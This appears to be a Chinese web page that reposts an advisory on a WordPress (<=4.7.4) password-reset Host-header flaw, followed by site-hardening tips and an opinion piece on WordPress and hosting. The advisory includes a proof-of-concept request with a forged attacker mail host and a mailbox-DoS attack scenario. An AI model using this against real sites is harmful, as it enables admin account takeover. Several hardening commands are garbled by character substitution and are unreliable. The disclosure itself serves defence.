WordPress是一種使用PHP語言開發的博客平臺,用戶可以在支持PHP和MySQL數據庫的服務器上架設屬于自己的網站。也可以把 WordPress當作一個內容管理系統(CMS)來使用。
WordPress是一款個人博客系統,并逐步演化成一款內容管理系統軟件,它是使用PHP語言和MySQL數據庫開發的。用戶可以在支持 PHP 和 MySQL數據庫的服務器上使用自己的博客。
WordPress有許多第三方開發的免費模板,安裝方式簡單易用。不過要做一個自己的模板,則需要你有一定的專業知識。比如你至少要懂的標準通用標記語言下的一個應用HTML代碼、CSS、PHP等相關知識。
WordPress官方支持中文版,同時有愛好者開發的第三方中文語言包,如wopus中文語言包。WordPress擁有成千上萬個各式插件和不計其數的主題模板樣式。
WordPress作為歐美流行的博客建站系統,被廣大中國用戶使用的同時也驚現出一系列的安全問題,一下是最新曝出的安全漏洞。
一、漏洞
WordPress內核<= 4.7.4存在未經授權的密碼重置(0day)
二、背景
WordPress是一個以PHP和MySQL為平臺的自由開源的博客軟件和內容管理系統。截止2017年2月,Alexa排名前1000萬的站點中約有27.5%使用該管理系統。據報道有超過6000萬站點使用WordPress進行站點管理或者作為博客系統。
三、介紹
WordPress的重置密碼功能存在漏洞,在某些情況下不需要使用之前的身份令牌驗證獲取密碼重置鏈接。
該攻擊可導致攻擊者在未經授權的情況下獲取用戶Wordpress后臺管理權限。
四、描述
該漏洞源于WordPress默認使用不可信的數據。當生成一個密碼重置郵件時應當是僅發送給與帳戶相關聯的電子郵件。
從下面的代碼片段可以看出,在調用PHP mail()函數前創建了一個From email頭
- ------[ wp-includes/pluggable.php ]------
- ...
- if ( !isset( $from_email ) ) {
- // Get the site domain and get rid of www.
- $sitename = strtolower( $_SERVER['SERVER_NAME'] );
- if ( substr( $sitename, 0, 4 ) == 'www.' ) {
- $sitename = substr( $sitename, 4 );
- }
- $from_email = 'wordpress@' . $sitename;
- }
- ...
- -----------------------------------------
正如我們所看到的,Wordpress為了生成重置郵件創建的一個From/Return-Path(發件人/收件人)頭,使用SERVER_NAME變量以獲取服務器的主機名。
然而,諸如Apache的主流web服務器默認使用由客戶端提供的主機名來設置SERVER_NAME變量(參考Apache文檔)
由于SERVER_NAME可以進行修改,攻擊者可以任意設置該值,例如attackers-mxserver.com
這將導致Wordpress的$from_email變為[email protected],最終導致包含From/Return-Path(發件人/收件人)設置的密碼重置郵件發送到了該惡意郵件地址。
至于攻擊者可以修改哪那一封電子郵件的頭信息,這取決于服務器環境(參考PHP文檔)
基于郵件服務器的配置,可能導致被修改過郵件頭的惡意收件人/發件人地址的電子郵件發送給WordPress用戶。
這使得攻擊者能夠在不需要進行交互就可以截取本該是需要進行交互才能進行的操作的密碼重置郵件。
攻擊場景:
如果攻擊者知道用戶的電子郵件地址。為了讓密碼重置郵件被服務器拒收,或者無法到達目標地址。他們可以先對用戶的電子郵件帳戶進行DoS攻擊(通過發送多個超過用戶磁盤配額的大文件郵件或攻擊該DNS服務器)
某些自動回復可能會附加有郵件發送副本
發送多封密碼重置郵件給用戶,迫使用戶對這些沒完沒了的密碼重置郵件進行回復,回復中就包含的密碼鏈接會發送給攻擊者。
五、POC
如果攻擊者將類似下面的請求發送到默認可通過IP地址訪問的Wordpress安裝頁面(IP-based vhost):
- -----[ HTTP Request ]----
- POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
- Host: injected-attackers-mxserver.com
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 56
- user_login=admin&redirect_to=&wp-submit=Get+New+Password
WordPress將觸發管理員賬戶的密碼重置功能
由于修改了主機頭,SERVER_NAME變量將被設置為攻擊者所選擇的主機名,因此Wordpress會將以下電子郵件頭信息和正文傳遞給/usr/bin/sendmail
- ------[ resulting e-mail ]-----
- Subject: [CompanyX WP] Password Reset
- Return-Path:
- From: WordPress
- Message-ID:
- X-Priority: 3
- MIME-Version: 1.0
- Content-Type: text/plain; charset=UTF-8
- Content-Transfer-Encoding: 8bit
有人請求將以下賬戶的密碼進行重置:
http://companyX-wp/wp/wordpress/
Username: admin
如果是弄錯了,直接忽略該郵件就好,重置密碼請訪問以下地址:
companyx-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>
正如我們看到的,Return-Path, From, 以及Message-ID字段都是攻擊者控制的域
通過bash腳本替換/usr/sbin/sendmail以執行頭的驗證:
#!/bin/bash
cat > /tmp/outgoing-email
六、業務影響
在利用成功的基礎上,攻擊者可重置用戶密碼并且未經授權獲取WordPress賬戶訪問權限。
七、系統影響
WordPress至最新版本4.7.4全部受影響
八、解決方案
目前沒有官方解決方案可用。作為臨時解決方案,用戶可以啟用UseCanonicalName執行SERVER_NAME靜態值(參考Apache)
在這里小編來分享一下wordpress建站過程中,可以有效提高其安全性的方法:
以下是我所做的變更,用來提高我的 WordPress 網站安全性,縱使這樣的意外可能再次發生。
#1 使用你的 Email 作為登入帳號
當你安裝完一個 WordPress 網站時,預設的第一位用戶為 “admin”。你應該建立不同的使用者名稱來管理你的 WordPress 網站,并將預設使用者 “admin” 刪除,或是將它的權限從「系統管理員」降級為「讀者」。
你也可以建立一個完全亂數(難以被猜中)的使用者名稱,然后使用你的 Email 來登入 WordPress。外掛 WP-Email Login 可以加入此支援,使用你的 Email 取代帳號登入。
#2 不要向全世界展示你的 WordPress 版本
WordPress 網站會在原始碼顯示版本號,讓其他人能夠知道你正在執行舊的 WordPress。
要從網頁里移除 WordPress 版本是狠簡單的一件事,但你需要做一些額外的補強,從你的 WordPress 目錄將 readme.html 檔案刪除,因為它也會把你所使用的 WordPress 版本展示給全世界。
#3 別讓其他人擁有”寫入”你 WordPress 目錄的權限
登入你的 WordPress 網站 Linux 系統列,執行以下指令來取得所有「公開」、其他用戶皆能寫入的目錄清單。
find . -type d -perm -o=w
你也許可以執行以下兩行指令,來將你 WordPress 內的檔案和目錄設定為正確的權限(參考資料)。
find /your/wordpress/folder/ -type d -exec chmod 755 {} /;
find /your/wordpress/folder/ -type f -exec chmod 644 {} /;
對目錄來說,755(rwxr-xr-x) 意味著只有擁有者具備寫入權限,其他人只有讀取和執行的權限。對檔案來說,644 (rw-r–r–) 意味著只有檔案擁有者具備讀取和寫入權限,其他人為唯讀。
#4 重新命名你的 WordPress 資料表前綴
如果你使用預設選項來安裝 WordPress 的話,你的 WordPress 資料表應該會像是 wp_posts 或 wp_users。將資料表的前綴(wp_)更改為其他隨機值是比較好的作法,外掛2Change DB Prefix2可以讓你在彈指之間重新命名你的資料表前綴。
#5 防止使用者瀏覽你的 WordPress 目錄結構
這狠重要。開啟你 WordPress 根目錄底下的 .htaccess 檔案,然后在最上方加入這行。
Options -Indexes
這能夠防止其他人在能建立檔案清單時看到你資料夾內的所有檔案。例如目錄下缺少預設的 index.PHP 或 index.html 時。
#6 更新 WordPress 安全密鑰
開啟此網頁來為你的 WordPress 網站產生八組安全密鑰。開啟 WordPress 目錄下的 wp-config.php 檔案,將預設的密鑰以產生的密鑰取而代之。
這些隨機的字串能使你儲存于 WordPress 的密碼更加安全,另一個好處是,當有人在你不知情的情抗下登入 WordPress,他們將會被立即登出,使他們的 cookies 失效。
#7 保留 WordPress PHP 和資料庫錯誤記錄
從錯誤記錄有時候可以發現針對你 WordPress 所發出的無效資料庫查詢或檔案查詢。我更喜歡外掛 Error Log Monitor,因為它能定期透過 Email 發送錯誤日志到你的信箱,也能顯示于你的 WordPress 控制臺。
要在 WordPress 啟用錯誤日志功能,將以下程式碼加入你的 wp-config.php 檔案,記得要把2/path/to/error.log 替換為你的日志文件實際路徑。error.log 應該放在無法直接從瀏覽器存取得到的目錄。(參考資料)
- define('WP_DEBUG', true);
- if (WP_DEBUG) {
- define('WP_DEBUG_DISPLAY', false);
- @ini_set('log_errors', 'On');
- @ini_set('display_errors', 'Off');
- @ini_set('error_log', '/path/to/error.log');
- }
#8 以密碼保護 Admin 控制臺
使用密碼來保護 wp-admin 目錄是一個不錯的方法,因為瀏覽你的公開 WordPress 網站并不需要用到這目錄下的任何檔案。一旦設定完成,即使是授權的用戶也需要輸入兩道密碼才能登入他們的 WordPress 控制臺。
#9 追蹤你的 WordPress 服務器登入動態
你可以在 linux 下使用 “last -i” 指令來列出所有登入你 WordPress 服務器的使用者,包括他們的 IP 位址。如果你發現清單內有未知的 IP 來源,那肯定要修改密碼了。
此外,下面的指令將顯示較長時間區間的登入動態,并使用 IP 位址分組(將 USERNAME 改為你的使用者名稱)。
last -if /var/log/wtmp.1 | grep USERNAME | awk 1{print $3}1 | sort | uniq -c
使用外掛來監控你的 WordPress 網站
WordPress.org 外掛庫包含不少好用的安全相關外掛,可以持續監控你的 WordPress 網站是否有被入侵,或是其他可疑活動。這些是我會建議使用,也較為基本的安全外掛。
Exploit Scanner – 它會迅速掃描你的所有 WordPress 檔案和文章,并列出潛藏惡意程式碼的。例如垃圾鏈結可能會使用 CSS 或 IFRAME 方式隱藏在你的 WordPress 網志文章里,而這個外掛可以將它們找出來。
WordFence Security – 這是一個非常強大、且應該使用的安全外掛。它會比對你 WordPress 的核心檔案和原始檔案間是否已被修改。而且,該外掛會鎖定嘗試登入你的網站卻失敗的使用者。
WordPress Sentinel – 另一個實用的外掛,可以監控你的 WordPress 檔案,當有任何檔案被加入、刪除或修改時會發出警告。
WP Notifier – 如果你不常登入你的 WordPress 控制臺,那這外掛適合你。它會在你安裝的背景主題、外掛和 WordPress 核心有新的更新時以 Email 通知你。
VIP Scanner – “官方”安全外掛將掃描你的 WordPress 背景主題有無任何問題,它也能檢測出有無任何的廣告程式碼被注入你的 WordPress 背景主題里。
小技巧:你也可以使用以下 Linux 指令來列出近三天被修改的檔案清單。將 mtime 改為 mmin 可以看到 “n” 分鐘前被修改的檔案清單。
find . -type f -mtime -3 | grep -v "/Maildir/" | grep -v "/logs/"
提高 WordPress 登入頁面安全性
你的 WordPress 登入頁面是每個人都可以存取的,但如果你想防止未授權的使用者登入 WordPress,你有以下三種選擇。
使用 .htaccess 加入密碼保護 – 在 WordPress 認證以外加入另一道帳號密碼來保護你的 wp-admin 目錄。
Google Authenticator – 這出色的外掛能為你的 WordPress 加入兩步驟驗證功能。除了輸入正確的密碼外,還必須搭配手機應用程式來輸入隨機產生的驗證碼。
Login Dongle – 這個外掛使用一個非常獨特的方法來保護你的 WordPress。它能產生一個書籤列(加上秘密問題),你可以將它加入瀏覽器。當你要登入 WordPress 時,輸入你的密碼並按下書籤列才能登入 WordPress – 登入頁面的按鈕將無法使用。
WP的優劣
WordPress是一款風靡全球的博客網站程序,這點毋容置疑。大量的主題,大量的插件,大量的API,極高的可定制性。
對于60%菜鳥來說,下個主題馬上網站就可以上線。就可以拿著網站到處炫耀,嘿!我TMD的有網站。 這是我的名片。就可以宣傳推廣了,是不是很方便。馬上進入SEO環節(SEO 有事一個吹比行業,能吹3天3夜)
作為30%中級玩家,你可以研究研究怎么用各種主題和插件讓網站更漂亮,功能更強大; 就是寫寫HTML CSS JQ。我稱呼為 熟練運用各種JQ插件的人。呵呵,不是看不起,是因為JQ只適合PC端,雖然手機端也出JQM,但沒繼承JQ輝煌,JQ已經十年了,就跟WINXP一樣,注定退場! (但是用戶最直接看到也是表現層 所以各種打著WP賺錢的人 也都停留在這個層面,水平一般般還指望一筆模板生意暴富人都在淘寶開店)
作為10%高級玩家,你可以編寫插件,制作主題;作為終級玩家,你可以使用WordPress做到任何你想要的網站。當然別說對于WP,任何PHP程序都可以改造成自己想要的網站。因為有技術懂一門后端語言,什么都不是問題。當然對于這部分人 肯定不會局限于WP。當然質量如何,每個人水平不一樣,人品如何。同樣無法保證,尤其在國內 傻子多,騙子也多。
有人說WP慢 確實慢,但也不慢,為什么?
這個的根本并不在于程序本身,而在于你的附加需求。自己愛折騰,愛鐵血,安裝N多插件,N多復雜的主題,造成數據量巨多,這能怪誰呢?而那些主題和插件的制作者,你無法讓他們每一個人寫出的主題或插件都是完美的,如果你希望變成這樣,那只能你自己動手了。
那些訪問量真正上百萬上千萬級別的網站,哪一個不是經過自己對網站做了大量優化的?
這里就引用別人的話(上面這段出處 蘆XX的博客,搞SEO不醉看他博客)
所以SEO做的好不好,跟程序無關,你用靜態頁面也可以,單頁面也可以,跟模板關系不大。為什么這個有過親生案例。SEO如何做,怎么做。如果你還是停留在發帖,論壇,我們就不要探討了。 你天天去李彥宏問 百度搜索如何做,李會搭理你嗎? 不是閑你煩,是太累。
服務器方面
云是趨勢,不要用云為什么,看到很多童鞋說用云就被關閉了如何如何。云計算這個東西,在國內發展也才這幾年,實話我也經歷過,國家都是給企業補貼,所以各大BAT都來搞云。拿著國家補貼做出來東西能好嗎?賺了國家補貼一筆,又來賺你們一筆,真是呵呵。 再來給你們768 256內存,XXX大硬盤,結果來個1M帶寬,到這里想想就笑了,任何網站多幾個人打開,如果的模板特效各種插件圖片比較多,由于各種蜘蛛在爬,那不直接就超過1M帶寬峰值,被封是注定的!
用專業的話說 云服務器實際的網絡吞吐量如何,這些決定直接影響你的應用性能!不管你用4vCPU和8GBRAM 還是16CPU 32GRAM都沒什么卵用,因為你帶寬峰值只有1M。你以為大企業省錢 選擇安全可靠,往往大企業才是最坑人的。老話叫店大欺客。想省錢不如租用 口碑好國外主機 CDN到國內。或者是 國內主機+CDN。 那個國內外主機那家好,這里不介紹,坑踩的多了人才會成長。
再次引用別人的話
WordPress仍然是這個世界上首屈一指的獨立博客網站程序,我并不是說其他博客程序不好,各有各的優點,有的博客程序更本地化,使用方式和語義等更適合中國用戶等等。如何選擇,見仁見智。但我希望的是,不要用片面的理念和單純的說法來忽悠小白,不要因為你自己的原因而去讓別人也跟著你那樣認為。
新聞熱點
疑難解答
圖片精選
